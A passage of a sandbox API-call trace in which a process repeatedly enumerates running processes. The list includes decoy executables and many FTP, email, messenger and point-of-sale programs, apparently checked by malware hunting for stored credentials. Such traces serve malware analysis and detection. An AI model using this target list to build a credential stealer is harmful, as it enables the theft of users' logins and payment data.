th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0278.766] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0278.768] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0278.769] CloseHandle (hObject=0x9e0) returned 1 [0278.769] Sleep (dwMilliseconds=0x64) [0278.878] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0278.894] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.896] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0278.898] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0278.899] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.901] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0278.903] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.906] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0278.908] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0278.910] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0278.911] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.912] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.914] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0278.916] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.918] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.956] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.957] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.958] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.960] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.961] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.963] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0278.964] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0278.968] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0278.970] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.971] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0278.972] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0278.974] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0278.975] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0278.977] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.978] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0278.980] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0278.986] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.988] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.989] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0278.991] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0278.992] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0278.994] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0278.996] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0279.050] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0279.052] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0279.053] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0279.054] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0279.056] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0279.057] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0279.084] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0279.086] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0279.087] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0279.088] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0279.090] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0279.094] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0279.095] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0279.097] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0279.098] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0279.099] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0279.101] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0279.102] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0279.104] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0279.105] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0279.109] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0279.111] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0279.113] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0279.114] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0279.116] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0279.118] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0279.120] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0279.256] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0279.259] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0279.261] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0279.263] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0279.265] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0279.267] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0279.269] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0279.271] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0279.273] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0279.274] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0279.276] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0279.278] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0279.281] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0279.282] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0279.284] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0279.286] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 